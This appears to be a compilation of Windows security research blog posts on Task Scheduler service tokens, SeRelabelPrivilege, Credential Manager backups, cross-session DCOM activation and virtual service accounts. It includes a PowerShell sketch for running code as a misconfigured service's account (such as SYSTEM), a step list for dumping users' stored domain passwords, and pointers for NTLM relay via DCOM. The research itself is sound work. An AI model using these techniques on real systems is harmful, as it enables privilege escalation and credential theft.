
A Little More on the Task Scheduler's Service Account Usage

Recently I was playing around with a service running under a full virtual service account, rather than LOCAL SERVICE or NETWORK SERVICE, but with SeImpersonatePrivilege removed. Looking for a solution I recalled that Andrea Pierini had posted a blog about using virtual service accounts, so I thought I'd look there for inspiration. One interesting thing he mentioned is that a technique abusing the task scheduler, found by Clément Labro, which worked for LS or NS, didn't work when using virtual service accounts. I thought I should investigate further out of curiosity, and in the process I found a sneaky technique you can use for other purposes.

I've already blogged about the task scheduler's use of service accounts. Specifically, in a previous blog post I discussed how you could get the TrustedInstaller group by running a scheduled task using the service SID. As the service SID has the same name as the one used for a virtual service account, it's clear that the problem lies in the way this functionality is implemented, and that it's likely distinct from how LS or NS tokens are created.

The core process creation code for the task scheduler in Windows 10 is actually in the Unified Background Process Manager (UBPM) DLL, rather than in the task scheduler itself. Taking a quick look at that DLL we find the following code:

HANDLE UbpmpTokenGetNonInteractiveToken(PSID PrincipalSid) {
  // ...
  if (UbpmUtilsIsServiceSid(PrincipalSid)) {
    return UbpmpTokenGetServiceAccountToken(PrincipalSid);
  }
  if (EqualSid(PrincipalSid, kNetworkService)) {
    Domain = L"NT AUTHORITY";
    User = L"NetworkService";
  } else if (EqualSid(PrincipalSid, kLocalService)) {
    Domain = L"NT AUTHORITY";
    User = L"LocalService";
  }
  HANDLE Token;
  if (LogonUserExExW(User, Domain, Password,
      LOGON32_LOGON_SERVICE,
      LOGON32_PROVIDER_DEFAULT, &Token)) {
    return Token;
  }
  // ...
}


This UbpmpTokenGetNonInteractiveToken function takes the principal SID from the task registration (or the one passed to RunEx) and determines what it represents in order to get back a token. It checks if the SID is a service SID, by which it means an NT SERVICE\NAME SID as used in the previous blog post. If it is, it calls a separate function, UbpmpTokenGetServiceAccountToken, to get the service token.

Otherwise, if the SID is NS or LS, then it specifies the well-known names for those SIDs and calls LogonUserExEx with the LOGON32_LOGON_SERVICE type. The UbpmpTokenGetServiceAccountToken function does the following:

HANDLE UbpmpTokenGetServiceAccountToken(PSID PrincipalSid) {
  LPCWSTR Name = UbpmUtilsGetAccountNamesFromSid(PrincipalSid);
  SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
  SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);
  HANDLE Token;
  GetServiceProcessToken(g_ScheduleServiceHandle, service, &Token);
  return Token;
}

This function gets the name from the service SID, which is the name of the service itself, and opens the service for all access rights (SERVICE_ALL_ACCESS). If that succeeds it passes the service handle to an undocumented SCM API, GetServiceProcessToken, which returns the token for the service. Looking at the implementation in the SCM, this basically uses the exact same code as it would use to create the token when starting the service.

This is why there's a distinction between LS/NS and a virtual service account when using Clément's technique. If you use LS/NS the task scheduler gets a fresh token from the LSA with no regard to how the service is configured, therefore the new token has SeImpersonatePrivilege (or whatever else is allowed). However, for a virtual service account the task scheduler asks the SCM for the service's token, and as the SCM knows what restrictions are in place it honours things like the privilege list or the SID type. The returned token will therefore have SeImpersonatePrivilege stripped again, even though it'll technically be a different token to the one in the currently running service.

Why does the task scheduler need an undocumented function to get the service token? As I mentioned in a previous blog post about virtual accounts, only the SCM (well, technically the first process to claim it's the SCM) is allowed to authenticate a token with a virtual service account. This seems kind of pointless if you ask me, as you already need SeTcbPrivilege to create the service token, but it is what it is.

Okay, so now we know why Clément's technique doesn't get you back any privileges. You might now be asking, so what? Well, one interesting behavior came from looking at how the task scheduler determines whether you're allowed to specify a service SID as a principal. In my blog post on creating a task running as TrustedInstaller I implied it needed administrator access, which is sort of true and sort of not. Let's see the function the task scheduler uses to determine if the caller is allowed to run a task as a specified principal.

BOOL IsPrincipalAllowed(User& principal) {
  RpcAutoImpersonate::RpcAutoImpersonate();
  User caller;
  User::FromImpersonationToken(&caller);
  RpcRevertToSelf();
  if (tsched::IsUserAdmin(caller) ||
      caller.IsLocalSystem()) {
    return TRUE;
  }

  if (principal == caller) {
    return TRUE;
  }

  if (principal.IsServiceSid()) {
    LPCWSTR Name = principal.GetAccount();
    RpcAutoImpersonate::RpcAutoImpersonate();
    SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
    SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);
    RpcRevertToSelf();
    if (service) {
      return TRUE;
    }
  }
  return FALSE;
}

The IsPrincipalAllowed function first checks if the caller is an administrator or SYSTEM. If it is, then any principal is allowed (again, not completely true, but good enough). Next it checks if the principal matches the caller's user SID. This is what allows NS/LS or a virtual service account to register a task running as its own user account.


Finally, if the principal is a service SID, then it tries to open the service for full access while impersonating the caller. If that succeeds it allows the service SID to be used as a principal. This behaviour is interesting as it allows for a sneaky way to abuse badly configured services. 


A well-known privilege escalation check is to enumerate all local services and see if any of them grant a normal user privileged access rights, mainly SERVICE_CHANGE_CONFIG. This is enough to hijack the service and get arbitrary code running as the service account. A common trick is to change the executable path and restart the service, but this isn't great for a few reasons:

  1. Changing the executable path could easily be noticed.
  2. You probably want to fix the path back again afterwards, which is just a pain.
  3. If the service is currently running you'll need to stop the service, then restart the modified service to get code execution.
However, as long as your account is granted full access to the service you can use the task scheduler, even without being an administrator, to get code running as the service's user account, such as SYSTEM, without ever needing to modify the service's configuration directly or stop/start the service. Much more sneaky. Of course this does mean that the token the task runs under might have privileges stripped etc., but that's easy enough to deal with (as long as it's not write restricted).
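As a rough sketch of how that looks in PowerShell, assuming the built-in ScheduledTasks module and a hypothetical VulnSvc service which your account has been granted full access to (the command and output path are placeholders):

PS> $a = New-ScheduledTaskAction -Execute cmd.exe -Argument '/c whoami /all > C:\temp\out.txt'
PS> $p = New-ScheduledTaskPrincipal -UserId 'NT SERVICE\VulnSvc' -LogonType ServiceAccount
PS> Register-ScheduledTask -TaskName SneakyTask -Action $a -Principal $p
PS> Start-ScheduledTask -TaskName SneakyTask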

This is a good lesson in never taking things at face value. I just assumed the caller would need administrator privileges to set a service account as the principal of a task, but it turns out that's not actually required if you dig into the code. Hopefully someone will find this useful.

Footnote: If you've read this far, you might also ask: can you get back SeImpersonatePrivilege from a virtual service account or not? Of course; you just use the named pipe trick I described in a previous blog post. Because of the way the token is created, the token stored in the logon session will still have all the assigned privileges. You can extract that token by using a named pipe to your own service, then use it to create a new process and get back all the missing privileges.






The Much Misunderstood SeRelabelPrivilege

Based on my previous blog post I recently had a conversation with a friend and well-known Windows security researcher about token privileges. Specifically, I was musing on how SeTrustedCredmanAccessPrivilege is not a "God" privilege. After some back and forth it seemed we were talking at cross purposes. My concept of a "God" privilege is one which the kernel considers to make a token elevated (see Reading Your Way Around UAC (Part 3)) and so doesn't make available to any token with an integrity level less than High. They, on the other hand, consider such a privilege to be one where you can directly compromise a resource, or the OS as a whole, by having the privilege enabled; this might include privileges which aren't strictly a "God" from the kernel's perspective but can still allow system compromise.

After realizing the misunderstanding I was still surprised that one of the privileges in their list wasn't considered a "God", specifically SeRelabelPrivilege. It seems there's perhaps some confusion as to what this privilege actually allows you to do, so I thought it'd be worth clearing up.

Point of pedantry: I don't believe it's correct to say that a resource has an integrity level. It instead has a mandatory label, which is stored in an ACE in the SACL. That ACE contains a SID which maps to an integrity level and a mandatory policy which is stored in the access mask. The combination of integrity level and policy is what determines what access is granted (although you can't grant write up through the policy). The token on the other hand does have an integrity level and a separate mandatory policy, which isn't the same as the one in the ACE. Oddly you specify the value when calling SetTokenInformation using a TOKEN_MANDATORY_LABEL structure; confusing, I know.

As with a lot of privileges which don't get used very often, the official documentation is not great. You can find the MSDN documentation here. The page is worse than usual as it seems to have been written at a time in the Vista/Longhorn development when the Mandatory Integrity Control (MIC) feature (or as the page calls it, Windows Integrity Control (WIC)) was still in flux. For example, it mentions an integrity level above System, called Installer. Presumably Installer was the initial idea to block administrators modifying system files, which was replaced by the TrustedInstaller SID as the owner (see previous blog posts). There is a level above System in Vista, called Protected Process, but it's not usable as protected processes were implemented using a different mechanism.

Distilling what the documentation says the privilege does, it allows for two operations. First it allows you to set the integrity level in a mandatory label ACE to be above the caller's token integrity level. Normally as long as you've been granted WRITE_OWNER access to a resource you can set the label's integrity level to any value less than or equal to the caller's integrity level.

For example, if you try to set the resource's label to System, but the caller is only at High, then the operation fails with the STATUS_INVALID_LABEL error. If you enable SeRelabelPrivilege then this operation will succeed.

Note, the privilege doesn't allow you to raise the integrity level of a token; you need SeTcbPrivilege for that. Without SeTcbPrivilege you can't raise a token's integrity level at all, even to a value less than or equal to the caller's; the operation can only ever decrease the level in the token.

The second operation is that you can decrease the label. In general you can always decrease the label without the privilege, unless the resource's label is above the caller's. For example, you can set the label to Low without any special privilege, as long as you have WRITE_OWNER access on the handle and the current label is less than or equal to the caller's. However, if the label is System and the caller is at High, then they can't decrease the label and the privilege is required.

The documentation has this to say (emphasis mine):

"If malicious software is set with an elevated integrity level such as Trusted Installer or System, administrator accounts do not have sufficient integrity levels to delete the program from the system. In that case, use of the Modify an object label right is mandated so that the object can be relabeled. However, the relabeling must occur by using a process that is at the same or a higher level of integrity than the object that you are attempting to relabel."

This is a very confused paragraph. First it indicates that an administrator can't delete a resource with a Trusted Installer or System integrity label and so requires the privilege to relabel it. Then it says that the process doing the relabeling must be at a greater or equal integrity level to the object, in which case you wouldn't need the privilege at all. Perhaps the original design of mandatory labels was more sticky, as in maybe you always needed SeRelabelPrivilege to reduce the label regardless of its current value?

In any case, the only user that gets SeRelabelPrivilege by default is SYSTEM, which runs at the System integrity level, already the maximum commonly allowed level, so this raising behavior seems pretty much moot. And as it's a "God" privilege it will be disabled if the token has an integrity level less than High, so the lowering operation is also going to be rarely useful.

This leads into the most misunderstood part, which if you squint you might be able to grasp from the privilege's documentation. The ability to lower the label of a resource is mostly dependent on whether the caller can get WRITE_OWNER access to the resource. However, the WRITE_OWNER access right is typically part of GENERIC_ALL in the generic mapping, which means it will never be granted to a caller with a lower integrity level, regardless of the DACL or whether they're the owner.

This is the interesting thing the privilege brings to the lowering operation: it allows the caller to circumvent the MIC check for WRITE_OWNER. The caller can therefore open a higher-labeled resource for WRITE_OWNER and then change the label to any level it likes. This works the same way as SeTakeOwnershipPrivilege, in that it grants WRITE_OWNER without ever checking the DACL. However, if you use SeTakeOwnershipPrivilege it'll still be subject to the MIC check and will not grant access if the label is above the caller's integrity level.

The problem with this privilege is down to the design of MIC, specifically that WRITE_OWNER is overloaded to allow setting the resource's mandatory label but also its traditional use of setting the owner. There's no way for the kernel to distinguish between the two operations once the access has been granted (or at least it doesn't try to distinguish). 

Surely there is some limitation on what type of resource can be granted WRITE_OWNER access? Nope; it seems that even if the caller is not granted any access rights by the resource's DACL it will still be granted WRITE_OWNER access. This makes SeRelabelPrivilege exactly like SeTakeOwnershipPrivilege, but with the added feature of circumventing the MIC check. Summarizing: a token with SeRelabelPrivilege enabled can take ownership of any resource it likes, even one which has a higher label than the caller's.

You can of course verify this yourself, here's some PowerShell script using NtObjectManager which you should run as an administrator. The script creates a security descriptor which doesn't grant SYSTEM any access, then tries to request WRITE_OWNER without and with SeRelabelPrivilege.

PS> $sd = New-NtSecurityDescriptor "O:ANG:AND:(A;;GA;;;AN)" -Type Directory
PS> Invoke-NtToken -System {
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status               Granted Access Privileges
------               -------------- ----------
STATUS_ACCESS_DENIED 0              NONE

PS> Invoke-NtToken -System {
   Enable-NtTokenPrivilege SeRelabelPrivilege
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status         Granted Access Privileges
------         -------------- ----------
STATUS_SUCCESS WriteOwner     SeRelabelPrivilege

The fact that this behavior is never made explicit is probably why my friend hadn't realized it before. This, coupled with the privilege's rare usage, only being granted by default to SYSTEM, means it's not really a problem in any meaningful sense. It would be interesting to know the design choices which led to the privilege being created; it seems like its role was significantly more important at some point and became almost vestigial during the Vista development process.

If you've read this far, is there any actually useful scenario for this privilege? The only resources which typically have elevated labels are processes and threads. You can already circumvent the MIC check on those using SeDebugPrivilege, but usage of that privilege is probably watched like a hawk, so you could abuse this privilege instead to get full access to an elevated process by changing the owner to the caller and lowering the label. Once you're the owner with a low label you can then modify the DACL to grant full access directly, without SeDebugPrivilege.

However, as only SYSTEM gets the privilege by default you'd need to impersonate a SYSTEM token, which would probably just allow you to access the process anyway. So it's mostly a useless quirk, unless the system you're looking at has granted it to service accounts, which might then open the door slightly to escaping to SYSTEM.

Dumping Stored Credentials with SeTrustedCredmanAccessPrivilege

I've been going through the various token privileges on Windows trying to find where they're used. One which looked interesting is SeTrustedCredmanAccessPrivilege which is documented as "Access Credential Manager as a trusted caller". The Credential Manager allows a user to store credentials, such as web or domain accounts in a central location that only they can access. It's protected using DPAPI so in theory it's only accessible when the user has authenticated to the system. The question is, what does having SeTrustedCredmanAccessPrivilege grant? I couldn't immediately find anyone who'd bothered to document it, so I guess I'll have to do it myself.

The Credential Manager is one of those features that probably sounded great in the design stage, but does introduce security risks, especially if it's used to store privileged domain credentials, such as for remote desktop access. An application, such as the remote desktop client, can store a domain credential using the CredWrite API, specifying the username and password in the CREDENTIAL structure. The credential type should be set to CRED_TYPE_DOMAIN_PASSWORD.

An application can then access the stored credentials for the current user using APIs such as CredRead or CredEnumerate. However, if the type of credential is CRED_TYPE_DOMAIN_PASSWORD the CredentialBlob field which should contain the password is always empty. This is an artificial restriction put in place by LSASS which implements the credential manager RPC service. If a domain credentials type is being read then it will never return the password.
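You can see this restriction in action with the built-in cmdkey tool, which will list stored credentials but never show a password (sample output, abbreviated):

C:\> cmdkey /list
Currently stored credentials:

    Target: Domain:target=TERMSRV/server
    Type: Domain Password
    User: DOMAIN\user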

How do the domain credentials get used if you can't read the password? Security packages such as NTLM/Kerberos/TSSSP, which run within the LSASS process, can use an internal API which doesn't restrict reading the domain password. Therefore, when you authenticate to the remote desktop service the target name is used to look up available credentials; if they exist the user will be automatically authenticated.

The credentials are stored in files in the user's profile, encrypted with the user's DPAPI key. Why can't we just decrypt the file directly to get the password? When writing the file LSASS sets a system flag in the encrypted blob which makes DPAPI refuse to decrypt the blob, even though it's still under the user's key. Only code running in LSASS can call DPAPI to decrypt the blob.

If we have administrator privileges, getting access to the password is trivial. Read the Mimikatz wiki page to understand the various ways you can use the tool to get access to the credentials. However, it boils down to one of the following approaches:

  1. Patch out the checks in LSASS to not blank the password when read from a normal user.
  2. Inject code into LSASS to decrypt the file or read the credentials.
  3. Just read them from LSASS's memory.
  4. Reimplement DPAPI with knowledge of the user's password to ignore the system flag.
  5. Play games with the domain key backup protocol.
For example, Nirsoft's CredentialsFileView seems to use the injection into LSASS technique to decrypt the DPAPI protected credential files. (Caveat, I've only looked at v1.07 as v1.10 seems to not be available for download anymore, so maybe it's now different. UPDATE: it seems available for download again but Defender thinks it's malware, plus ça change).

At this point you can probably guess that SeTrustedCredmanAccessPrivilege allows a caller to get access to a user's credentials. But how exactly? Looking at LSASRV.DLL which contains the implementation of the Credential Manager the privilege is checked in the function CredpIsRpcClientTrusted. This is only called by two APIs, CredrReadByTokenHandle and CredrBackupCredentials which are exported through the CredReadByTokenHandle and CredBackupCredentials APIs.

The CredReadByTokenHandle API isn't that interesting; it's basically CredRead, but the user whose credentials are read is specified by providing that user's token. As far as I can tell reading a domain credential still returns a blank password. CredBackupCredentials on the other hand is interesting. It's the API used by CREDWIZ.EXE to back up a user's credentials, which can then be restored at a later time. This backup includes all credentials, including domain credentials. The prototype for the API is as follows:

BOOL WINAPI CredBackupCredentials(HANDLE Token, 
                                  LPCWSTR Path, 
                                  PVOID Password, 
                                  DWORD PasswordSize, 
                                  DWORD Flags);

The backup process is slightly convoluted. First you run CREDWIZ on your desktop, select backup and specify the file you want to write the backup to. When you continue, the process makes an RPC call to your WinLogon process with the credentials path, which spawns a new copy of CREDWIZ on the secure desktop. At this point you're instructed to use CTRL+ALT+DEL to switch to the secure desktop. There you type the password, which is used to encrypt the file to protect it at rest and is needed when the credentials are restored. CREDWIZ will even ensure it meets your system's password policy for complexity, how generous.

CREDWIZ first writes the backup to a temporary file, as LSASS additionally encrypts the contents with the system DPAPI key. The file is then decrypted and written to the final destination, with appropriate impersonation etc.

The only requirement for calling this API is having the SeTrustedCredmanAccessPrivilege privilege enabled. Assuming we're an administrator, getting this privilege is easy as we can just borrow a token from another process. For example, checking which processes have the privilege shows obviously WinLogon, but also LSASS itself, even though it arguably doesn't need it.

PS> $ts = Get-AccessibleToken
PS> $ts | ? { 
   "SeTrustedCredmanAccessPrivilege" -in $_.ProcessTokenInfo.Privileges.Name 
}
TokenId Access                                  Name
------- ------                                  ----
1A41253 GenericExecute|GenericRead    LsaIso.exe:124
1A41253 GenericExecute|GenericRead     lsass.exe:672
1A41253 GenericExecute|GenericRead winlogon.exe:1052
1A41253 GenericExecute|GenericRead atieclxx.exe:4364

I've literally no idea what the ATIECLXX.EXE process is doing with SeTrustedCredmanAccessPrivilege, it's probably best not to ask ;-)

To use this API to back up a user's credentials as an administrator you do the following:
  1. Open a WinLogon process for PROCESS_QUERY_LIMITED_INFORMATION access and get a handle to its token with TOKEN_DUPLICATE access.
  2. Duplicate the token into an impersonation token, then enable SeTrustedCredmanAccessPrivilege.
  3. Open a token to the target user, who must already be authenticated.
  4. Call CredBackupCredentials while impersonating the WinLogon token passing a path to write to and a NULL password to disable the user encryption (just to make life easier). It's CREDWIZ which enforces the password policy not the API.
  5. While still impersonating open the file and decrypt it using the CryptUnprotectData API, write back out the decrypted data.
If it all goes well you'll have all of the user's credentials in a packed binary format. I couldn't immediately find anyone documenting the format, but people have obviously done so before. I'll leave doing all this yourself as an exercise for the reader; I don't feel like providing an implementation.


Why would you do this when there already exist plenty of other options? The main advantage, if you can call it that, is that you never touch LSASS and definitely never inject any code into it, which wouldn't be possible anyway if LSASS is running as PPL. You also don't need to access the SECURITY hive to extract DPAPI credentials or know the user's password (assuming they're authenticated of course). About the only slightly suspicious thing is opening WinLogon to get a token, though there might be alternative approaches to get a suitable token.



Standard Activating Yourself to Greatness

This week @decoder_it and @splinter_code disclosed a new way of abusing DCOM/RPC NTLM relay attacks to access remote servers. It relies on the fact that if you're logged in as a user in session 0 (such as through PowerShell remoting) and you call CoGetInstanceFromIStorage, the DCOM activator creates the object on the lowest interactive session rather than in session 0. Once the object is created the initial unmarshal of the IStorage object happens in the context of the user authenticated to that session. If that happens to be a privileged user, such as a Domain Administrator, then the NTLM authentication can be relayed to a remote server and fun ensues.

The obvious problem with this attack is the requirement of being in session 0. Certainly it's possible a non-admin user might be allowed to authenticate to a system via PowerShell remoting but it'd be rarer than just being authenticated on a Terminal Server with multiple other users you could attack. It'd be nice if somehow you could pick the session that the object was created on.

Of course this already exists: you can use the session moniker to activate an object cross-session (other than to session 0, which is special). I've abused this feature multiple times for cross-session attacks, such as this, this or this. I've repeatedly told Microsoft they need to fix this activation route as it makes no sense that a non-administrator can do it, but my warnings have not been heeded.

If you read the description of the session moniker you might notice a problem for us: it can't be combined with IStorage activation, as the COM APIs only give us one or the other. However, if you poke around in the DCOM protocol documentation you'll notice that they are technically independent. The session is specified by setting the dwSessionId field in the SpecialPropertiesData activation property, and the marshalled IStorage object can be passed in the ifdStg field of the InstanceInfoData activation property. You package those activation properties up and send them to the IRemoteSCMActivator RemoteGetClassObject or RemoteCreateInstance methods. Of course it's possible this won't really work, but at least they are independent properties and could be mixed.

The problem with testing this out is that implementing DCOM activation yourself is ugly. The activation properties first need to be NDR marshalled into a blob, which then needs to be packaged up correctly before it can be sent to the activator. Also the documentation only covers remote activation, which is not what we want, and there are some weird quirks of local activation I'm not going to go into. Is there any documented way to access the activator without doing all this?

No, sorry. There is an undocumented way though, if you're interested? Sure? Okay good, let's carry on. The key with these sorts of challenges is to look at how the system already does it. Specifically we can look at how the session moniker activates the object; maybe we'll be lucky and can reuse that machinery for our own purposes.

Where to start? If you read this MSDN article you can see you need to call MkParseDisplayNameEx to parse the string into a moniker. But that's really a wrapper over MkParseDisplayName to provide URL moniker functionality, which we don't care about. We'll just start at MkParseDisplayName, which is in OLE32.

HRESULT MkParseDisplayName(LPBC pbc, LPCOLESTR szUserName,
      ULONG *pchEaten, LPMONIKER *ppmk) {
  HRESULT hr = FindLUAMoniker(pbc, szUserName, pchEaten, ppmk);
  if (hr == MK_E_UNAVAILABLE) {
    hr = FindSessionMoniker(pbc, szUserName, pchEaten, ppmk);
  }
  // Parse rest of moniker.
}

Almost immediately we see a call to FindSessionMoniker, which seems promising. Looking into that function we find what we need.

HRESULT FindSessionMoniker(LPBC pbc, LPCWSTR pszDisplayName,
                           ULONG *pchEaten, LPMONIKER *ppmk) {
  DWORD dwSessionId = 0;
  BOOL bConsole = FALSE;

  if (wcsnicmp(pszDisplayName, L"Session:", 8))
    return MK_E_UNAVAILABLE;

  if (!wcsnicmp(pszDisplayName + 8, L"Console", 7)) {
    bConsole = TRUE;
    *pchEaten = 15;
  } else {
    LPWSTR EndPtr;
    dwSessionId = wcstoul(pszDisplayName + 8, &EndPtr, 0);
    *pchEaten = EndPtr - pszDisplayName;
  }

  *ppmk = new CSessionMoniker(dwSessionId, bConsole);
  return S_OK;
}

This code parses out the session moniker data and then creates a new instance of the CSessionMoniker class. Of course this doesn't do any activation yet. You don't use the session moniker in isolation; instead you're supposed to build a composite moniker with a new or class moniker. The MkParseDisplayName API will keep parsing the string (which is why pchEaten is updated) and combine each moniker it finds. Therefore, if you have the moniker display name:

Session:3!clsid:0002DF02-0000-0000-C000-000000000046

The API will return a composite moniker consisting of the session moniker for session 3 and the class moniker for CLSID 0002DF02-0000-0000-C000-000000000046, which is the Browser Broker. The example code then calls BindToObject on the composite moniker, which first calls the right-most moniker, the class moniker.
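As an aside, you can exercise this same parse-and-bind path from PowerShell using .NET's Marshal.BindToMoniker method, which wraps MkParseDisplayName and BindToObject (whether the final bind succeeds depends on the class and the target session, so treat this as a quick sketch):

PS> [Runtime.InteropServices.Marshal]::BindToMoniker("Session:3!clsid:0002DF02-0000-0000-C000-000000000046")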

HRESULT CClassMoniker::BindToObject(LPBC pbc,
  LPMONIKER pmkToLeft, REFIID riid, void **ppv) {
  if (pmkToLeft) {
    IClassActivator* pClassActivator;
    pmkToLeft->BindToObject(pbc, nullptr,
      IID_IClassActivator, (void**)&pClassActivator);
    return pClassActivator->GetClassObject(m_clsid,
          CLSCTX_SERVER, 0, riid, ppv);
  }
  // ...
}

The pmkToLeft parameter is set by the composite moniker to the left moniker, which is the session moniker. We can see that the class moniker calls the session moniker's BindToObject method requesting an IClassActivator interface. It then calls the GetClassObject method, passing it the CLSID to activate. We're almost there.

HRESULT CSessionMoniker::GetClassObject(
   REFCLSID pClassId, CLSCTX dwClsContext,
   LCID locale, REFIID riid, void **ppv) {
  IStandardActivator* pActivator;
  CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER,
    IID_IStandardActivator, (void**)&pActivator);

  ISpecialSystemProperties* pSpecialProperties;
  pActivator->QueryInterface(IID_ISpecialSystemProperties,
      (void**)&pSpecialProperties);
  pSpecialProperties->SetSessionId(m_sessionid, m_console, TRUE);
  return pActivator->StandardGetClassObject(pClassId, dwClsContext,
                                            NULL, riid, ppv);
}

Finally the session moniker creates a new COM activator object with the IStandardActivator interface. It then queries for the ISpecialSystemProperties interface and sets the moniker's session ID and console state, before calling the StandardGetClassObject method on the IStandardActivator; you should now have a COM server activated cross-session. None of these interfaces, or the class, are officially documented of course (AFAIK).

The $1000 question is: can you also do IStorage activation through the IStandardActivator interface? Poking around in COMBASE at the implementation of the interface, you find one of its functions is:

HRESULT StandardGetInstanceFromIStorage(COSERVERINFO* pServerInfo, 
  REFCLSID pclsidOverride, IUnknown* punkOuter, CLSCTX dwClsCtx, 
  IStorage* pstg, int dwCount, MULTI_QI pResults[]);

It seems the answer is yes. Of course it's possible that you still can't mix the two things up, which is why I wrote a quick and dirty example in C#, available here. It seems to work fine, although I've not tested it with the actual vulnerability to see if it works in that scenario. That's something for others to do.

Creating your own Virtual Service Accounts

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer, what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts.

A virtual service account allows you to create an access token where the user SID is a service SID, for example NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured, which makes them ideal for restricting services, rather than having to deal with the default service accounts and using WSH to lock them down, or specifying a domain user with a password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the first RID of the account's SID must be in the range 80 to 111 inclusive. Recall from the previous blog post that this is exactly the same range covered by LsaManageSidNameMapping.
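The undocumented prototype appears to mirror the documented LogonUserExW with an extra PTOKEN_GROUPS parameter; treat this reconstruction as a best guess:

BOOL WINAPI LogonUserExExW(
    LPWSTR lpszUsername,        // e.g. L"USER"
    LPWSTR lpszDomain,          // e.g. L"AWESOME DOMAIN"
    LPWSTR lpszPassword,        // NULL for a virtual service account.
    DWORD dwLogonType,          // e.g. LOGON32_LOGON_SERVICE.
    DWORD dwLogonProvider,      // LOGON32_PROVIDER_VIRTUAL.
    PTOKEN_GROUPS pTokenGroups, // Optional additional groups for the token.
    PHANDLE phToken,            // Receives the new token.
    PSID* ppLogonSid,
    PVOID* ppProfileBuffer,
    LPDWORD pdwProfileLength,
    PQUOTA_LIMITS pQuotaLimits);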

The LogonUserExEx API only takes strings for the domain and username; you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks), however everything else in the RID range is fair game.

So let's create our own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Before we can log on the account we need to grant it a logon right. This is normally SeServiceLogonRight if you want a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually log in interactively with your virtual account, at least not easily).

If you get the latest version of NtObjectManager (from GitHub at the time of writing) you can use the Add-NtAccountRight command to add the logon right.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to log on the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose an interactive logon type the token will also have the INTERACTIVE group assigned. Anyway, that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS doesn't want to document these features, even though they could be useful for normal developers.



Using LsaManageSidNameMapping to add a name to a SID.

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). It turns out that after a little digging they lead to the same RPC function in LSASS, just through different routes:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there are two of them, or why one is documented but the other not, *shrug*. Of course, even though there's an MSDN entry for the function it doesn't seem to actually be declared in the Ntsecapi.h include file, *double shrug*. The best documentation I found was this header file.
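For reference, the core definitions look like the following (reconstructed from the MSDN entry and that header file; as nothing ships in the SDK, treat the exact names as approximate):

typedef enum _LSA_SID_NAME_MAPPING_OPERATION_TYPE {
    LsaSidNameMappingOperation_Add,
    LsaSidNameMappingOperation_Remove,
    LsaSidNameMappingOperation_AddMultiple
} LSA_SID_NAME_MAPPING_OPERATION_TYPE;

typedef struct _LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT {
    UNICODE_STRING DomainName;  // e.g. "AWESOME DOMAIN"
    UNICODE_STRING AccountName; // Optional, empty to register just the domain.
    PSID Sid;
    ULONG Flags;
} LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT;

NTSTATUS NTAPI LsaManageSidNameMapping(
    LSA_SID_NAME_MAPPING_OPERATION_TYPE OperationType,
    PLSA_SID_NAME_MAPPING_OPERATION_INPUT OperationInput,
    PLSA_SID_NAME_MAPPING_OPERATION_OUTPUT* OperationOutput);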

This got me wondering if I could map all the AppContainer named capabilities via LSASS, so that normal applications would resolve them rather than me having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly, while you can add some SID-to-name mappings, this API won't let you do that for capability SIDs as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register the domain SID's name first before you can register any SID contained within that domain.
Basically restriction 2 stops us adding a sub-domain SID for a capability, as they use the package security authority (15). And we can't go straight to adding the SID-to-name mapping either, as we need to have registered the domain with the API first; it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


Generating NDR Type Serializers for C#

As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts, such as the Privileged Attribute Certificate (PAC), use Network Data Representation (NDR). This is due to those parts of the protocol being derived from the older NetLogon protocol, which uses MSRPC, which in turn uses NDR.

